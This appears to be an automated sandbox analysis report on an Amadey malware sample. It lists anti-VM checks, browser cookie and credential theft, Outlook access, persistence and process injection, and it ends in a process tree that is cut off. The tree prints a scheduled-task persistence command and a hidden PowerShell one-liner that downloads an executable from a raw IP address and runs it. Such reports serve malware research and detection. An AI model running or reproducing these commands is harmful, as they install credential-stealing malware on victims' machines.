amadey | 4fca71c67716c65a8500227d5e3ae2b4488cb85279d386b599005857d1d4ba05

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 13 IoCs

flow	pid	Process
19	2600	powershell.exe
34	5628	powershell.exe
36	5628	powershell.exe
38	5628	powershell.exe
43	3372	powershell.exe
46	3372	powershell.exe
175	3372	powershell.exe
189	3372	powershell.exe
191	3372	powershell.exe
193	3372	powershell.exe
195	3372	powershell.exe
196	3372	powershell.exe
197	5628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5628	powershell.exe
2600	powershell.exe
3372	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
64	1976	rapes.exe
19	2600	powershell.exe

Uses browser remote debugging 2 TTPs 16 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3480	msedge.exe
4360	msedge.exe
1124	chrome.exe
3260	msedge.exe
1224	chrome.exe
3436	chrome.exe
2592	msedge.exe
4492	msedge.exe
4512	chrome.exe
4768	chrome.exe
5028	chrome.exe
6104	chrome.exe
2088	chrome.exe
5588	chrome.exe
4568	msedge.exe
3680	chrome.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE

Executes dropped EXE 11 IoCs

pid	Process
1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
1976	rapes.exe
628	CmvdYC4.exe
1208	ZSoeRVBe.exe
2496	program.exe
1132	rapes.exe
1244	ibC8xs1.exe
1968	exp.exe
2008	DgQBvwg.exe
6076	exp.exe
4424	rapes.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe

Loads dropped DLL 46 IoCs

pid	Process
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe
1208	ZSoeRVBe.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MSBuild.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
280	ip-api.com
35	api.ipify.org
36	api.ipify.org
37	ipinfo.io
45	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
1976	rapes.exe
1132	rapes.exe
4424	rapes.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1244 set thread context of 4708	1244	ibC8xs1.exe	160
PID 1968 set thread context of 1324	1968	exp.exe	171
PID 4708 set thread context of 2592	4708	MSBuild.exe	172
PID 2008 set thread context of 3820	2008	DgQBvwg.exe	177
PID 4708 set thread context of 5192	4708	MSBuild.exe	183
PID 6076 set thread context of 5548	6076	exp.exe	188

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	MSBuild.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	281	Go-http-client/1.1

Kills process with taskkill 4 IoCs

defense_evasion

pid	Process
2224	taskkill.exe
4004	taskkill.exe
5752	taskkill.exe
1256	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	rapes.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2600	powershell.exe
2600	powershell.exe
1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
1976	rapes.exe
1976	rapes.exe
5628	powershell.exe
5628	powershell.exe
5628	powershell.exe
3372	powershell.exe
3372	powershell.exe
3372	powershell.exe
1132	rapes.exe
1132	rapes.exe
5588	chrome.exe
5588	chrome.exe
1968	exp.exe
1968	exp.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe
4708	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
3260	msedge.exe
3260	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeIncreaseQuotaPrivilege	5628	powershell.exe
Token: SeSecurityPrivilege	5628	powershell.exe
Token: SeTakeOwnershipPrivilege	5628	powershell.exe
Token: SeLoadDriverPrivilege	5628	powershell.exe
Token: SeSystemProfilePrivilege	5628	powershell.exe
Token: SeSystemtimePrivilege	5628	powershell.exe
Token: SeProfSingleProcessPrivilege	5628	powershell.exe
Token: SeIncBasePriorityPrivilege	5628	powershell.exe
Token: SeCreatePagefilePrivilege	5628	powershell.exe
Token: SeBackupPrivilege	5628	powershell.exe
Token: SeRestorePrivilege	5628	powershell.exe
Token: SeShutdownPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeSystemEnvironmentPrivilege	5628	powershell.exe
Token: SeRemoteShutdownPrivilege	5628	powershell.exe
Token: SeUndockPrivilege	5628	powershell.exe
Token: SeManageVolumePrivilege	5628	powershell.exe
Token: 33	5628	powershell.exe
Token: 34	5628	powershell.exe
Token: 35	5628	powershell.exe
Token: 36	5628	powershell.exe
Token: SeIncreaseQuotaPrivilege	5628	powershell.exe
Token: SeSecurityPrivilege	5628	powershell.exe
Token: SeTakeOwnershipPrivilege	5628	powershell.exe
Token: SeLoadDriverPrivilege	5628	powershell.exe
Token: SeSystemProfilePrivilege	5628	powershell.exe
Token: SeSystemtimePrivilege	5628	powershell.exe
Token: SeProfSingleProcessPrivilege	5628	powershell.exe
Token: SeIncBasePriorityPrivilege	5628	powershell.exe
Token: SeCreatePagefilePrivilege	5628	powershell.exe
Token: SeBackupPrivilege	5628	powershell.exe
Token: SeRestorePrivilege	5628	powershell.exe
Token: SeShutdownPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeSystemEnvironmentPrivilege	5628	powershell.exe
Token: SeRemoteShutdownPrivilege	5628	powershell.exe
Token: SeUndockPrivilege	5628	powershell.exe
Token: SeManageVolumePrivilege	5628	powershell.exe
Token: 33	5628	powershell.exe
Token: 34	5628	powershell.exe
Token: 35	5628	powershell.exe
Token: 36	5628	powershell.exe
Token: SeIncreaseQuotaPrivilege	5628	powershell.exe
Token: SeSecurityPrivilege	5628	powershell.exe
Token: SeTakeOwnershipPrivilege	5628	powershell.exe
Token: SeLoadDriverPrivilege	5628	powershell.exe
Token: SeSystemProfilePrivilege	5628	powershell.exe
Token: SeSystemtimePrivilege	5628	powershell.exe
Token: SeProfSingleProcessPrivilege	5628	powershell.exe
Token: SeIncBasePriorityPrivilege	5628	powershell.exe
Token: SeCreatePagefilePrivilege	5628	powershell.exe
Token: SeBackupPrivilege	5628	powershell.exe
Token: SeRestorePrivilege	5628	powershell.exe
Token: SeShutdownPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeSystemEnvironmentPrivilege	5628	powershell.exe
Token: SeRemoteShutdownPrivilege	5628	powershell.exe
Token: SeUndockPrivilege	5628	powershell.exe
Token: SeManageVolumePrivilege	5628	powershell.exe
Token: 33	5628	powershell.exe
Token: 34	5628	powershell.exe
Token: 35	5628	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5588	chrome.exe
3260	msedge.exe
2592	rundll32.exe
5192	rundll32.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 3568	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1088 wrote to memory of 3568	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1088 wrote to memory of 3568	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1088 wrote to memory of 5704	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1088 wrote to memory of 5704	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1088 wrote to memory of 5704	1088	2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3568 wrote to memory of 1440	3568	cmd.exe	90
PID 3568 wrote to memory of 1440	3568	cmd.exe	90
PID 3568 wrote to memory of 1440	3568	cmd.exe	90
PID 5704 wrote to memory of 2600	5704	mshta.exe	91
PID 5704 wrote to memory of 2600	5704	mshta.exe	91
PID 5704 wrote to memory of 2600	5704	mshta.exe	91
PID 2600 wrote to memory of 1260	2600	powershell.exe	103
PID 2600 wrote to memory of 1260	2600	powershell.exe	103
PID 2600 wrote to memory of 1260	2600	powershell.exe	103
PID 1260 wrote to memory of 1976	1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE	104
PID 1260 wrote to memory of 1976	1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE	104
PID 1260 wrote to memory of 1976	1260	TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE	104
PID 1976 wrote to memory of 5628	1976	rapes.exe	108
PID 1976 wrote to memory of 5628	1976	rapes.exe	108
PID 1976 wrote to memory of 5628	1976	rapes.exe	108
PID 5628 wrote to memory of 3372	5628	powershell.exe	111
PID 5628 wrote to memory of 3372	5628	powershell.exe	111
PID 5628 wrote to memory of 3372	5628	powershell.exe	111
PID 1976 wrote to memory of 628	1976	rapes.exe	117
PID 1976 wrote to memory of 628	1976	rapes.exe	117
PID 628 wrote to memory of 1208	628	CmvdYC4.exe	120
PID 628 wrote to memory of 1208	628	CmvdYC4.exe	120
PID 3372 wrote to memory of 2496	3372	powershell.exe	121
PID 3372 wrote to memory of 2496	3372	powershell.exe	121
PID 2496 wrote to memory of 1256	2496	program.exe	127
PID 2496 wrote to memory of 1256	2496	program.exe	127
PID 2496 wrote to memory of 5588	2496	program.exe	128
PID 2496 wrote to memory of 5588	2496	program.exe	128
PID 5588 wrote to memory of 5132	5588	chrome.exe	129
PID 5588 wrote to memory of 5132	5588	chrome.exe	129
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130
PID 5588 wrote to memory of 4500	5588	chrome.exe	130

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn vgBjHmaINPI /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn vgBjHmaINPI /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1440
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Users\Admin\AppData\Local\TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
      "C:\Users\Admin\AppData\Local\TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1260
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
